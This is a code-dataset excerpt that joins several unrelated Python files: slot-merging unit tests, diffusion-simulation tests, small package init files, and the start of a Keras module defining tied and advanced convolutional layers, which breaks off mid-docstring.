expected_s, actual_s, 'COMPLEX CASE #1: Wrong result!'
)
def test_merge_case_complex_2(self):
"""UNIT test: services.common.slots.merge_slots (complex case #2)
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, COMPLEX CASE #2')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc() + timedelta(hours=0),
misc.get_today_utc() + timedelta(hours=1))
q = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=3))
r = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=4))
s = (misc.get_today_utc() + timedelta(hours=3),
misc.get_today_utc() + timedelta(hours=5))
m = (misc.get_today_utc() + timedelta(hours=0),
misc.get_today_utc() + timedelta(hours=3))
expected_s = [(m[1], r[1]), s]
actual_s = slots.merge_slots([p, q, r, s], [m])
if self.__verbose_testing:
misc.print_list([p, q, r, s], name='(+) slots')
misc.print_list([m], name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(
expected_s, actual_s, 'COMPLEX CASE #2: Wrong result!'
)
def test_merge_case_complex_3(self):
"""UNIT test: services.common.slots.merge_slots (complex case #3)
"""
if self.__verbose_testing:
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
print('TESTING MERGE, COMPLEX CASE #3')
print('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')
p = (misc.get_today_utc() + timedelta(hours=0),
misc.get_today_utc() + timedelta(hours=1))
q = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=3))
r = (misc.get_today_utc() + timedelta(hours=2),
misc.get_today_utc() + timedelta(hours=4))
s = (misc.get_today_utc() + timedelta(hours=3),
misc.get_today_utc() + timedelta(hours=5))
t = (misc.get_today_utc() + timedelta(hours=6),
misc.get_today_utc() + timedelta(hours=7))
u = (misc.get_today_utc() + timedelta(hours=8),
misc.get_today_utc() + timedelta(hours=9))
v = (misc.get_today_utc() + timedelta(hours=10),
misc.get_today_utc() + timedelta(hours=11))
m = (misc.get_today_utc() + timedelta(hours=0),
misc.get_today_utc() + timedelta(hours=3))
n = (misc.get_today_utc() + timedelta(hours=3, minutes=30),
misc.get_today_utc() + timedelta(hours=4))
expected_s = [(m[1], n[0]), (s[0], n[0]), (n[1], s[1]), t, u, v]
actual_s = slots.merge_slots([p, q, r, s, t, u, v], [m, n])
if self.__verbose_testing:
misc.print_list([p, q, r, s], name='(+) slots')
misc.print_list([m, n], name='(-) slots')
misc.print_list(actual_s, name='(A) slots')
misc.print_list(expected_s, name='(EXPECTED) slots')
self.assertCountEqual(
expected_s, actual_s, 'COMPLEX CASE #1: Wrong result!'
)
| 40.051771 | 76 | 0.532621 | 1,768 | 14,699 | 4.19457 | 0.080882 | 0.0774 | 0.132686 | 0.165858 | 0.876079 | 0.860437 | 0.827131 | 0.81486 | 0.798274 | 0.75836 | 0 | 0.012316 | 0.265324 | 14,699 | 366 | 77 | 40.161202 | 0.674414 | 0.105041 | 0 | 0.733068 | 0 | 0 | 0.162198 | 0.075016 | 0 | 0 | 0 | 0 | 0.051793 | 1 | 0.051793 | false | 0 | 0.011952 | 0 | 0.067729 | 0.306773 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
799208e279fdc06182f1e5610519857cba2f864a | 712 | py | Python | test.py | MichaelVoelkel/lintly-flake8-github-action-test | 8dcfa4f13dc497565c5837d37f3cd7f51205fef9 | [
"MIT"
] | null | null | null | test.py | MichaelVoelkel/lintly-flake8-github-action-test | 8dcfa4f13dc497565c5837d37f3cd7f51205fef9 | [
"MIT"
] | null | null | null | test.py | MichaelVoelkel/lintly-flake8-github-action-test | 8dcfa4f13dc497565c5837d37f3cd7f51205fef9 | [
"MIT"
] | null | null | null | def foo():
print("this is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too longthis is too long") | 356 | 701 | 0.800562 | 133 | 712 | 4.285714 | 0.06015 | 0.377193 | 0.957895 | 1.105263 | 0.966667 | 0.966667 | 0.966667 | 0.966667 | 0.966667 | 0.966667 | 0 | 0 | 0.189607 | 712 | 2 | 701 | 356 | 0.987868 | 0 | 0 | 0 | 0 | 0.5 | 0.964937 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0.5 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 16 |
799da4d9e3f320ac547c86bf23ba846c1534b649 | 138 | py | Python | mp_workshop/__init__.py | mse215/mplectures | 41fb4dc54378fc58899068385e499fe616af38d4 | [
"BSD-3-Clause"
] | null | null | null | mp_workshop/__init__.py | mse215/mplectures | 41fb4dc54378fc58899068385e499fe616af38d4 | [
"BSD-3-Clause"
] | null | null | null | mp_workshop/__init__.py | mse215/mplectures | 41fb4dc54378fc58899068385e499fe616af38d4 | [
"BSD-3-Clause"
] | null | null | null | from crystal_toolkit.helpers.pythreejs_renderer import view
from crystal_toolkit.helpers.pythreejs_renderer import view as display_struct
| 46 | 77 | 0.898551 | 19 | 138 | 6.263158 | 0.578947 | 0.184874 | 0.302521 | 0.420168 | 0.87395 | 0.87395 | 0.87395 | 0.87395 | 0 | 0 | 0 | 0 | 0.072464 | 138 | 2 | 78 | 69 | 0.929688 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 11 |
79b1811bfe8f4b72879d868ca7b99158f1c766ec | 3,761 | py | Python | pyphasefield/tests/test_Diffusion.py | AdditiveModeling/DiffusionTutorial | 973b8f765ef175e1739172faa1573a35af0a3f3e | [
"MIT"
] | 1 | 2022-03-25T08:14:55.000Z | 2022-03-25T08:14:55.000Z | pyphasefield/tests/test_Diffusion.py | AdditiveModeling/DiffusionTutorial | 973b8f765ef175e1739172faa1573a35af0a3f3e | [
"MIT"
] | null | null | null | pyphasefield/tests/test_Diffusion.py | AdditiveModeling/DiffusionTutorial | 973b8f765ef175e1739172faa1573a35af0a3f3e | [
"MIT"
] | 1 | 2020-06-06T14:05:41.000Z | 2020-06-06T14:05:41.000Z | import pyphasefield as ppf
def test_diffusion_default1dexplicit():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10])
sim.simulate(2)
def test_diffusion_default2dexplicit():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10])
sim.simulate(2)
def test_diffusion_default3dexplicit():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10, 10])
sim.simulate(2)
def test_diffusion_Implicit1D():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10], solver="implicit")
sim.simulate(2)
def test_diffusion_Implicit1D_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10], solver="implicit", gmres=True)
sim.simulate(2)
def test_diffusion_Implicit2D():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10], solver="implicit")
sim.simulate(2)
def test_diffusion_Implicit2D_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10], solver="implicit", gmres=True)
sim.simulate(2)
def test_diffusion_Implicit2D_ADI():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10], solver="implicit", adi=True)
sim.simulate(2)
def test_diffusion_Implicit2D_ADI_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10], solver="implicit", gmres=True, adi=True)
sim.simulate(2)
def test_diffusion_Implicit3D():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([5, 5, 5], solver="implicit")
sim.simulate(2)
def test_diffusion_Implicit3D_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([5, 5, 5], solver="implicit", gmres=True)
sim.simulate(2)
def test_diffusion_Implicit3D_ADI():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([5, 5, 5], solver="implicit", adi=True)
sim.simulate(2)
def test_diffusion_Implicit3D_ADI_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([5, 5, 5], solver="implicit", gmres=True, adi=True)
sim.simulate(2)
def test_diffusion_CrankNicolson1D():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10], solver="crank-nicolson")
sim.simulate(2)
def test_diffusion_CrankNicolson1D_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10], solver="crank-nicolson", gmres=True)
sim.simulate(2)
def test_diffusion_CrankNicolson2D():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10], solver="crank-nicolson")
sim.simulate(2)
def test_diffusion_CrankNicolson2D_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10], solver="crank-nicolson", gmres=True)
sim.simulate(2)
def test_diffusion_CrankNicolson2D_ADI():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10], solver="crank-nicolson", adi=True)
sim.simulate(2)
def test_diffusion_CrankNicolson2D_ADI_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([10, 10], solver="crank-nicolson", gmres=True, adi=True)
sim.simulate(2)
def test_diffusion_CrankNicolson3D():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([5, 5, 5], solver="crank-nicolson")
sim.simulate(2)
def test_diffusion_CrankNicolson3D_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([5, 5, 5], solver="crank-nicolson", gmres=True)
sim.simulate(2)
def test_diffusion_CrankNicolson3D_ADI():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([5, 5, 5], solver="crank-nicolson", adi=True)
sim.simulate(2)
def test_diffusion_CrankNicolson3D_ADI_GMRES():
sim = ppf.Simulation("test")
sim.init_sim_Diffusion([5, 5, 5], solver="crank-nicolson", gmres=True, adi=True)
sim.simulate(2) | 32.422414 | 84 | 0.691571 | 503 | 3,761 | 4.952286 | 0.059642 | 0.064633 | 0.147732 | 0.184665 | 0.96387 | 0.96387 | 0.96387 | 0.912485 | 0.877961 | 0.787635 | 0 | 0.038792 | 0.163786 | 3,761 | 116 | 85 | 32.422414 | 0.753259 | 0 | 0 | 0.494624 | 0 | 0 | 0.082935 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.247312 | false | 0 | 0.010753 | 0 | 0.258065 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8dc1e182b7b343cf3b4ba874275e81a2ab0c56ce | 196 | py | Python | drf_jsonpatch/__init__.py | yoann9344/drf_jsonpatch | 5000bb05bce539a4089f8f5cd8ecec6ef6ea05ae | [
"MIT"
] | null | null | null | drf_jsonpatch/__init__.py | yoann9344/drf_jsonpatch | 5000bb05bce539a4089f8f5cd8ecec6ef6ea05ae | [
"MIT"
] | null | null | null | drf_jsonpatch/__init__.py | yoann9344/drf_jsonpatch | 5000bb05bce539a4089f8f5cd8ecec6ef6ea05ae | [
"MIT"
] | null | null | null | from drf_jsonpatch.apply_json_patch import apply_json_patch # noqa: F401
# execute patch
import drf_jsonpatch.patchs.parser # noqa: F401
import drf_jsonpatch.patchs.serialiazers # noqa: F401
| 28 | 73 | 0.811224 | 28 | 196 | 5.428571 | 0.464286 | 0.236842 | 0.184211 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 0.127551 | 196 | 6 | 74 | 32.666667 | 0.836257 | 0.234694 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
8dd33df3a323f26fb8cf61c41c5ae50efc776d97 | 157,646 | py | Python | layers/conv.py | cainmagi/MDNT | 4affd8a83698ce6786c04dddacdcf7415f8c5f90 | [
"MIT"
] | 14 | 2019-09-24T07:33:13.000Z | 2021-03-04T16:27:29.000Z | layers/conv.py | cainmagi/MDNT | 4affd8a83698ce6786c04dddacdcf7415f8c5f90 | [
"MIT"
] | 1 | 2020-02-28T04:24:09.000Z | 2020-03-03T08:55:31.000Z | layers/conv.py | cainmagi/MDNT | 4affd8a83698ce6786c04dddacdcf7415f8c5f90 | [
"MIT"
] | 6 | 2020-08-24T03:35:41.000Z | 2021-02-10T08:02:16.000Z | '''
################################################################
# Layers - Modern convolutional layers
# @ Modern Deep Network Toolkits for Tensorflow-Keras
# Yuchen Jin @ cainmagi@gmail.com
# Requirements: (Pay attention to version)
# python 3.6+
# tensorflow r1.13+
# A modern convolutional layer could be written as:
# PRelu ( gamma * [( conv(x, W) - mu ) / sigma ] + beta )
# which indicates that it should contain:
# 1. A convolutional kernel.
# 2. A normalization layer.
# 3. Activation.
# We recommend to use instance normalization and PRelu in most
# cases. This idea is introduced in
# https://arxiv.org/abs/1502.03167v3
# To learn transposed convolution, see
# https://arxiv.org/abs/1603.07285v1
# http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf
# We recommend users to use new work-flow for transposed
# convolutional layers, if user want to switch back to old
# style of Keras, please set this macro:
# mdnt.layers.conv.NEW_CONV_TRANSPOSE = False
# Here we also implement some tied convolutional layers, note
# that it is necessary to set name scope if using them in multi-
# models.
# Version: 0.61 # 2019/6/20
# Comments:
# Fix a bug for using bias when set normalization=None in
# AConv.
# Version: 0.60 # 2019/6/12
# Comments:
# Strengthen the compatibility.
# Version: 0.58 # 2019/6/11
# Comments:
# Fix a bug for normalization layers inside AConv when
# channels_first.
# Version: 0.55 # 2019/6/6
# Comments:
# A failed try for quick group convolution (QGroupConv), move
# it to deprecated.
# Version: 0.5 # 2019/6/6
# Comments:
# Enable the advanced convolutional layers (AConv) to support
# group convolution.
# Version: 0.4 # 2019/6/5
# Comments:
# Add group convolutional layers (`GroupConv`).
# Version: 0.35 # 2019/5/28
# Comments:
# 1. Change the order of Cropping layer for AConvTranspose.
# 2. Fix the bug of dilation_rate for AConvTranspose.
# Version: 0.30 # 2019/5/22
# Comments:
# Enhance the transposed convolution to enable it to infer
# the padding/cropping policy from desired output shape.
# Version: 0.23 # 2019/3/30
# Comments:
# Fix a bug when using lrelu without giving configs.
# Version: 0.22 # 2019/3/28
# Comments:
# Enable the transposed convolution to control output-padding
# in both directions.
# Version: 0.21 # 2019/3/27
# Comments:
# Add compatible support and fix a bug about activation.
# Version: 0.20 # 2019/3/26
# Comments:
# Add transposed convolutional layers to this handle.
# Version: 0.10 # 2019/3/25
# Comments:
# Create this submodule.
################################################################
'''
from tensorflow.python.framework import tensor_shape
from tensorflow.python.keras import activations
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import constraints
from tensorflow.python.keras import initializers
from tensorflow.python.keras import regularizers
from tensorflow.python.keras.utils import conv_utils
from tensorflow.python.keras.engine.base_layer import Layer
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import variables
from tensorflow.keras.layers import BatchNormalization, LeakyReLU, PReLU
from tensorflow.python.keras.layers.convolutional import Conv, Conv2DTranspose, Conv3DTranspose, UpSampling1D, UpSampling2D, UpSampling3D, ZeroPadding1D, ZeroPadding2D, ZeroPadding3D, Cropping1D, Cropping2D, Cropping3D
from .normalize import InstanceNormalization, GroupNormalization
from .. import compat
if compat.COMPATIBLE_MODE['1.12']:
from tensorflow.python.keras.engine.base_layer import InputSpec
else:
from tensorflow.python.keras.engine.input_spec import InputSpec
NEW_CONV_TRANSPOSE = True
def _get_macro_conv():
return NEW_CONV_TRANSPOSE
_check_dl_func = lambda a: all(ai==1 for ai in a)
class Conv1DTied(Conv2DTranspose):
"""Tied convolution layer (sometimes called Deconvolution).
Compared to `Conv1DTranspose`, this implementation requires a `Conv1D`
layer to provide kernel which would be used as the kernel for transpo-
sed convolution. As a result, this implementation is a symmetric layer
for the provided layer.
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 3)` for 128 length vector
in `data_format="channels_last"`.
NOTE THAT ALTHOUGH WE HAVE SUCCESSED TO MAKE THIS LAYER SERIALIZABLE,
IT MAY BE STILL PROBLEMATIC FOR TRAINING ALGORITHM. PLEASE BE CAREFUL
WHEN USING SUCH KIND OF LAYERS.
IN MULTIPLE MODELS, THIS INSTANCE MAY CAUSING CONFLICTS BECAUSE IT
USES GLOBAL VARIABLE NAME TO SERIALIZE CROSSED LAYERS. IT IS
RECOMMENDED TO SEPARATE NAME SCOPES WHEN USING MULTIPLE MODELS.
Arguments:
padding: one of `"valid"` or `"same"` (case-insensitive).
output_padding: An integer or tuple/list of 1 integers,
specifying the amount of padding along the height and width
of the output tensor.
Can be a single integer to specify the same value for all
spatial dimensions.
The amount of output padding along a given dimension must be
lower than the stride along that same dimension.
If set to `None` (default), the output shape is inferred.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
bias_initializer: Initializer for the bias vector.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation")..
bias_constraint: Constraint function applied to the bias vector.
Reserved arguments:
varName, filters, kernel_size, strides, data_format,
dilation_rate: only used when saving and restoring the layer.
Input shape:
3D tensor with shape:
`(batch, channels, steps)` if data_format='channels_first'
or 3D tensor with shape:
`(batch, steps, channels)` if data_format='channels_last'.
Output shape:
3D tensor with shape:
`(batch, filters, new_steps)` if data_format='channels_first'
or 3D tensor with shape:
`(batch, new_steps, filters)` if data_format='channels_last'.
`new_steps` values might have changed due to padding.
"""
def __init__(self,
tied_layer='',
padding='valid',
output_padding=None,
activation=None,
use_bias=True,
bias_initializer='zeros',
bias_regularizer=None,
activity_regularizer=None,
bias_constraint=None,
varName='',
filters=None,
kernel_size=1,
strides=1,
data_format=None,
dilation_rate=1,
**kwargs):
# Reserved variables
if tied_layer != '':
self.kernelFrom = tied_layer.kernel.name
data_format = tied_layer.data_format
strides = (1, *tied_layer.strides)
dilation_rate = (1, *tied_layer.dilation_rate)
super(Conv2DTranspose, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
bias_initializer=initializers.get(bias_initializer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
self.output_padding = output_padding
if output_padding is not None:
if isinstance(output_padding, (list, tuple)) and len(output_padding)==2:
self.output_padding = output_padding
else:
output_padding = conv_utils.normalize_tuple(output_padding, 1, 'output_padding')
self.output_padding = (1, *output_padding)
self.varName = varName
self.input_spec = InputSpec(ndim=3)
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
if len(input_shape) != 3:
raise ValueError('Inputs should have rank 3. Received input shape: ' + str(input_shape))
if self.data_format == 'channels_first':
channel_axis = 1
self.get_channels_first = True
else:
channel_axis = -1
self.get_channels_first = False
if input_shape.dims[channel_axis].value is None:
raise ValueError('The channel dimension of the inputs '
'should be defined. Found `None`.')
input_dim = int(input_shape[channel_axis])
self.input_spec = InputSpec(ndim=3, axes={channel_axis: input_dim})
if self.varName == '':
kernelFrom = list(filter(lambda x:x.name==self.kernelFrom, [op for op in variables.global_variables(scope=None)]))[0]
else:
kernelFrom = list(filter(lambda x:x.name==self.varName, [op for op in variables.global_variables(scope=None)]))[0]
self.kernel = K.expand_dims(kernelFrom, axis=0)
# Save/Load information from tied layer (or database).
if self.varName == '':
kernel_shape = self.kernel.get_shape().as_list()
self.varName = kernelFrom.name
self.kernel_size = kernel_shape[:2]
self.filters = kernel_shape[2]
if self.output_padding is not None:
for stride, out_pad in zip(self.strides, self.output_padding):
if out_pad >= stride:
raise ValueError('Stride ' + str(self.strides) + ' must be '
'greater than output padding ' +
str(self.output_padding))
if self.use_bias:
self.bias = self.add_weight(
name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
self.built = True
def call(self, inputs):
print(inputs)
if self.get_channels_first:
r2_inputs = K.expand_dims(inputs, axis=2)
get_r2_out = super(Conv1DTied, self).call(r2_inputs)
return K.squeeze(get_r2_out, axis=2)
else:
r2_inputs = K.expand_dims(inputs, axis=1)
get_r2_out = super(Conv1DTied, self).call(r2_inputs)
return K.squeeze(get_r2_out, axis=1)
def get_config(self):
config = super(Conv1DTied, self).get_config()
config['varName'] = self.varName
config['tied_layer'] = ''
return config
class Conv2DTied(Conv2DTranspose):
"""Tied convolution layer (sometimes called Deconvolution).
Compared to `Conv2DTranspose`, this implementation requires a `Conv2D`
layer to provide kernel which would be used as the kernel for transpo-
sed convolution. As a result, this implementation is a symmetric layer
for the provided layer.
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
NOTE THAT ALTHOUGH WE HAVE SUCCESSED TO MAKE THIS LAYER SERIALIZABLE,
IT MAY BE STILL PROBLEMATIC FOR TRAINING ALGORITHM. PLEASE BE CAREFUL
WHEN USING SUCH KIND OF LAYERS.
IN MULTIPLE MODELS, THIS INSTANCE MAY CAUSING CONFLICTS BECAUSE IT
USES GLOBAL VARIABLE NAME TO SERIALIZE CROSSED LAYERS. IT IS
RECOMMENDED TO SEPARATE NAME SCOPES WHEN USING MULTIPLE MODELS.
Arguments:
padding: one of `"valid"` or `"same"` (case-insensitive).
output_padding: An integer or tuple/list of 2 integers,
specifying the amount of padding along the height and width
of the output tensor.
Can be a single integer to specify the same value for all
spatial dimensions.
The amount of output padding along a given dimension must be
lower than the stride along that same dimension.
If set to `None` (default), the output shape is inferred.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
bias_initializer: Initializer for the bias vector.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation")..
bias_constraint: Constraint function applied to the bias vector.
Reserved arguments:
varName, filters, kernel_size, strides, data_format,
dilation_rate: only used when saving and restoring the layer.
Input shape:
4D tensor with shape:
`(batch, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(batch, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
tied_layer='',
padding='valid',
output_padding=None,
activation=None,
use_bias=True,
bias_initializer='zeros',
bias_regularizer=None,
activity_regularizer=None,
bias_constraint=None,
varName='',
filters=None,
kernel_size=1,
strides=1,
data_format=None,
dilation_rate=1,
**kwargs):
# Reserved variables
if tied_layer != '':
self.kernelFrom = tied_layer.kernel.name
data_format = tied_layer.data_format
strides = tied_layer.strides
dilation_rate = tied_layer.dilation_rate
super(Conv2DTranspose, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
bias_initializer=initializers.get(bias_initializer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
self.output_padding = output_padding
if self.output_padding is not None:
self.output_padding = conv_utils.normalize_tuple(self.output_padding, 2, 'output_padding')
self.varName = varName
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
if len(input_shape) != 4:
raise ValueError('Inputs should have rank 4. Received input shape: ' + str(input_shape))
if self.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
if input_shape.dims[channel_axis].value is None:
raise ValueError('The channel dimension of the inputs '
'should be defined. Found `None`.')
input_dim = int(input_shape[channel_axis])
self.input_spec = InputSpec(ndim=4, axes={channel_axis: input_dim})
if self.varName == '':
kernelFrom = list(filter(lambda x:x.name==self.kernelFrom, [op for op in variables.global_variables(scope=None)]))[0]
else:
kernelFrom = list(filter(lambda x:x.name==self.varName, [op for op in variables.global_variables(scope=None)]))[0]
self.kernel = kernelFrom
# Save/Load information from tied layer (or database).
if self.varName == '':
kernel_shape = self.kernel.get_shape().as_list()
self.varName = kernelFrom.name
self.kernel_size = kernel_shape[:2]
self.filters = kernel_shape[2]
if self.output_padding is not None:
for stride, out_pad in zip(self.strides, self.output_padding):
if out_pad >= stride:
raise ValueError('Stride ' + str(self.strides) + ' must be '
'greater than output padding ' +
str(self.output_padding))
if self.use_bias:
self.bias = self.add_weight(
name='bias',
shape=(self.filters,),
initializer=self.bias_initializer,
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
trainable=True,
dtype=self.dtype)
else:
self.bias = None
self.built = True
def get_config(self):
config = super(Conv2DTied, self).get_config()
config['varName'] = self.varName
config['tied_layer'] = ''
return config
class Conv3DTied(Conv3DTranspose):
"""Tied convolution layer (sometimes called Deconvolution).
Compared to `Conv3DTranspose`, this implementation requires a `Conv3D`
layer to provide kernel which would be used as the kernel for transpo-
sed convolution. As a result, this implementation is a symmetric layer
for the provided layer.
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 128, 3)` for a 128x128x128 volume with 3 channels
if `data_format="channels_last"`.
NOTE THAT ALTHOUGH WE HAVE SUCCESSED TO MAKE THIS LAYER SERIALIZABLE,
IT MAY BE STILL PROBLEMATIC FOR TRAINING ALGORITHM. PLEASE BE CAREFUL
WHEN USING SUCH KIND OF LAYERS.
IN MULTIPLE MODELS, THIS INSTANCE MAY CAUSING CONFLICTS BECAUSE IT
USES GLOBAL VARIABLE NAME TO SERIALIZE CROSSED LAYERS. IT IS
RECOMMENDED TO SEPARATE NAME SCOPES WHEN USING MULTIPLE MODELS.
Arguments:
padding: one of `"valid"` or `"same"` (case-insensitive).
output_padding: An integer or tuple/list of 3 integers,
specifying the amount of padding along the depth, height, and
width.
Can be a single integer to specify the same value for all
spatial dimensions.
The amount of output padding along a given dimension must be
lower than the stride along that same dimension.
If set to `None` (default), the output shape is inferred.
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
bias_initializer: Initializer for the bias vector
(see [initializers](../initializers.md)).
bias_regularizer: Regularizer function applied to the bias vector
(see [regularizer](../regularizers.md)).
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
bias_constraint: Constraint function applied to the bias vector
(see [constraints](../constraints.md)).
Reserved arguments:
varName, filters, kernel_size, strides, data_format:
only used when saving and restoring the layer.
Input shape:
5D tensor with shape:
`(batch, channels, depth, rows, cols)` if data_format='channels_first'
or 5D tensor with shape:
`(batch, depth, rows, cols, channels)` if data_format='channels_last'.
Output shape:
5D tensor with shape:
`(batch, filters, new_depth, new_rows, new_cols)` if
data_format='channels_first'
or 5D tensor with shape:
`(batch, new_depth, new_rows, new_cols, filters)` if
data_format='channels_last'.
